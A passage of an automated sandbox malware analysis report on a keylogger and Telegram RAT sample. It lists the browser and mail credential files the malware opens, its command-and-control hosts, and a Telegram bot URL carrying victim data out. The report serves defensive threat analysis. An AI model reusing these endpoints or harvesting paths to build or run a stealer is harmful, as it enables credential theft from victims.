                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: CMR_7649.EXE.exeBinary or memory string: WIN_XP
                  Source: CMR_7649.EXE.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: CMR_7649.EXE.exeBinary or memory string: WIN_XPe
                  Source: CMR_7649.EXE.exeBinary or memory string: WIN_VISTA
                  Source: CMR_7649.EXE.exeBinary or memory string: WIN_7
                  Source: CMR_7649.EXE.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS117
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		2
                  Valid Accounts                  		LSA Secrets121
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials11
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  CMR_7649.EXE.exe29%ReversingLabsWin32.Trojan.Generic
                  CMR_7649.EXE.exe100%AviraHEUR/AGEN.1321671
                  CMR_7649.EXE.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://www.office.com/0%Avira URL Cloudsafe
                  https://api.telegram.org0%Avira URL Cloudsafe
                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                  https://www.office.com/lB0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a0%Avira URL Cloudsafe
                  https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                  https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		193.122.130.0
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.office.com/RegSvcs.exe, 00000001.00000002.4110039811.0000000003184000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003175000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.orgRegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/botCMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.office.com/lBRegSvcs.exe, 00000001.00000002.4110039811.000000000317F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.orgRegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000001.00000002.4110039811.0000000003153000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003144000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://varders.kozow.com:8081CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://aborters.duckdns.org:8081CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.000000000300A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20aRegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://anotherarmy.dns.army:8081CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/qCMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000001.00000002.4110039811.000000000314E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedCMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          188.114.96.3
                          		reallyfreegeoip.orgEuropean Union
                          		13335CLOUDFLARENETUStrue
                          193.122.130.0
                          		checkip.dyndns.comUnited States
                          		31898ORACLE-BMC-31898USfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519293
                          Start date and time:2024-09-26 10:22:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 2s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:CMR_7649.EXE.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                          EGA Information:
                          • Successful, ratio: 50%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 53
                          • Number of non-executed functions: 300
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target RegSvcs.exe, PID 3152 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: CMR_7649.EXE.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          04:23:03API Interceptor10124773x Sleep call for process: RegSvcs.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
